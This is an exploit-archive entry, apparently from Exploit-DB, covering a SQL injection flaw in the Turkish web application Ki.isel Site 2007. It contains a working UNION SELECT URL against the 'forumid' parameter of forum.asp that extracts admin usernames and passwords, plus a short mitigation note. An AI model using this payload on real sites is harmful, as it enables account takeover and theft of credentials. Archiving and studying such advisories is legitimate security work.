Ki.isel Site 2007 (tr) SQL Injection Vulnerability

vendor:

Ki.isel Site 2007 (tr)

by:

cl24zy

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Ki.isel Site 2007 (tr)

Affected Version From: Ki.isel Site 2007 (tr)

Affected Version To: Ki.isel Site 2007 (tr)

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Ki.isel Site 2007 (tr) SQL Injection Vulnerability

The vulnerability allows an attacker to perform SQL injection through the 'forum.asp' page. By manipulating the 'forumid' parameter, an attacker can retrieve sensitive information such as admin usernames and passwords.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

###############################################################
#Ki.isel Site 2007 (tr) == SQL Injection Vulnerability
#Author : cl24zy
#Site : www.hacklive.org , www.illegal-attack.org
#Contact: admin@hacklive.org
###############################################################
#Download Ki.isel Site 2007 (tr) : http://www.aspindir.com/goster/4693
#Demo : http://www.gazilogo.com/personel/

#Exploit;
#Admin Nick, Passport;
http://[SITE]/forum.asp?sayfa=konular&forumid=-1%20union+all+select+0,kullaniciadi,2,3,sifre,5,6,7+from+admin

#Union data Text;
#Konu Ba.l.klar. : Admin UserName
#Yazan : Admin Password

# iLLeGaL-ATTaCK//TiM & HacKLivETeaM
################################################################

# milw0rm.com [2007-02-06]